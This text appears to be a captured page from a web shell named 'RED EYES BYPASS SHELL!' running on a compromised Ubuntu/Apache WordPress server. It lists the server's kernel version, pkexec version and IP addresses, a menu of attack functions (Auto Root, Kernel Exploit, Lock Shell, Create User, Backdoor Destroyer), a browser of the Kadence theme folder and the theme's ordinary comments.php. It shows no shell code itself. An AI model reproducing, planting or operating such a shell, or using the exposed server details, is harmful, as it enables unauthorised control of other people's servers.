Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
kadence /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
bbpress
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lifterlms
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
tribe
[ DIR ]
drwxr-xr-x
tribe-events
[ DIR ]
drwxr-xr-x
tutor
[ DIR ]
drwxr-xr-x
404.php
403
B
-rwxr-xr-x
500.php
887
B
-rwxr-xr-x
LICENSE
34.33
KB
-rwxr-xr-x
accessibility.txt
2.1
KB
-rwxr-xr-x
changelog.txt
50.31
KB
-rwxr-xr-x
comments.php
1010
B
-rwxr-xr-x
footer.php
725
B
-rwxr-xr-x
functions.php
955
B
-rwxr-xr-x
header.php
1.24
KB
-rwxr-xr-x
index.php
284
B
-rwxr-xr-x
offline.php
948
B
-rwxr-xr-x
page.php
322
B
-rwxr-xr-x
readme.txt
54.44
KB
-rwxr-xr-x
screenshot.png
278.59
KB
-rwxr-xr-x
sidebar.php
841
B
-rwxr-xr-x
single.php
322
B
-rwxr-xr-x
style.css
1.32
KB
-rwxr-xr-x
theme.json
3.2
KB
-rwxr-xr-x
wpml-config.xml
2.76
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying comments * * This is the template that displays the area of the page that contains both the current comments * and the comment form. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package kadence */ namespace Kadence; if ( ! defined( 'ABSPATH' ) ) { exit; } /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } kadence()->print_styles( 'kadence-comments' ); ?> <div id="comments" class="comments-area<?php echo ( kadence()->option( 'post_footer_area_boxed' ) ? ' content-bg entry-content-wrap entry' : '' ); ?>"> <?php do_action( 'kadence_before_comments' ); /** * Kadence Comments hook. * * @hooked Kadence/comments_list - 10 * @hooked Kadence/comments_form - 15/5 */ do_action( 'kadence_comments' ); do_action( 'kadence_after_comments' ); ?> </div><!-- #comments -->
Close